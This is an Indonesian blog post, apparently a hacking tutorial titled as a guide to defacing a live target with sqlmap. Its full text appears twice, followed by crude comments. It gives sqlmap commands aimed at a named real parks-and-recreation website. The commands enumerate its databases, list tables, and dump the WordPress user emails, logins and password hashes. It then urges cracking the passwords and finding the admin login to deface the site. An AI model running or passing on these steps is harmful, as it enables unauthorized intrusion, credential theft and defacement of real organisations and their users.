Cara deface Sqlmap live target
Kali ini ane mau posting tentang deface, Yup cara deface dengan SQLMAP di Windows, oke langsung simak aja tutorial nya
Alat perang :
>Sqlmap
>Python
>Google Dork
yng pertama, instal dulu python nya, lalu taro file SQLMAP nya di C:/sqlmap
buka CMD, ente pergi ke direktori SQLMAP yang ada di C:/sqlmap, dengan perintah> cd C:/sqlmap
lalu ketikan perintah >sqlmap.py untuk menjalankan SQLMAP
Lalu ketikan Perintah> sqlmap.py -u https://target.com --dbs perintah ini untuk melihat isi database
Contoh:> sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 --dbs
nah, ada 3 database di situs https://www.bransonparksandrecreation.com/
Ane pilih database blrpwp, masukan perintah > sqlmap.py -u https://target.com -D nama_db --tables Contoh:>sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp --tables
ada 34 tables didalem database blrpwp
Skrng cari tabel admin/user/auth/login,dll yng berhubungan dengan administrator.
Contoh: wp_users
Ketikan perintah>sqlmap.py -u https:/target.com -D nama_db -T nama_table --column
Contoh:sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp -C wp_users --column
Ketikkan perintah > sqlmap.py -u http://target.com -D nama_db -T nama_tabel -C kolom1,kolom2,kolom2,dst --dump untuk melihat isi dari kolom tersebut.
contoh: sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp -T wp_users -C user_email,user_login,user_pass -dump
Nah skrng udh dapet dapet kan data nya tinggal decrypt password nya and cari tempat admin login nya :)
Alat perang :
>Sqlmap
>Python
>Google Dork
yng pertama, instal dulu python nya, lalu taro file SQLMAP nya di C:/sqlmap
buka CMD, ente pergi ke direktori SQLMAP yang ada di C:/sqlmap, dengan perintah> cd C:/sqlmap
lalu ketikan perintah >sqlmap.py untuk menjalankan SQLMAP
Lalu ketikan Perintah> sqlmap.py -u https://target.com --dbs perintah ini untuk melihat isi database
Contoh:> sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 --dbs
nah, ada 3 database di situs https://www.bransonparksandrecreation.com/
Ane pilih database blrpwp, masukan perintah > sqlmap.py -u https://target.com -D nama_db --tables Contoh:>sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp --tables
ada 34 tables didalem database blrpwp
Skrng cari tabel admin/user/auth/login,dll yng berhubungan dengan administrator.
Contoh: wp_users
Ketikan perintah>sqlmap.py -u https:/target.com -D nama_db -T nama_table --column
Contoh:sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp -C wp_users --column
Ketikkan perintah > sqlmap.py -u http://target.com -D nama_db -T nama_tabel -C kolom1,kolom2,kolom2,dst --dump untuk melihat isi dari kolom tersebut.
contoh: sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp -T wp_users -C user_email,user_login,user_pass -dump
Nah skrng udh dapet dapet kan data nya tinggal decrypt password nya and cari tempat admin login nya :)
This comment has been removed by the author.
ReplyDeleteCara masuk ke tempat admin nya bagaimana bang atau bisa di cari di red hawk
ReplyDeleteCari dong kontol manja amat
Deletememang kontol dewh..wkwkwkwkwkwk
Deleteawokawok mmk
ReplyDelete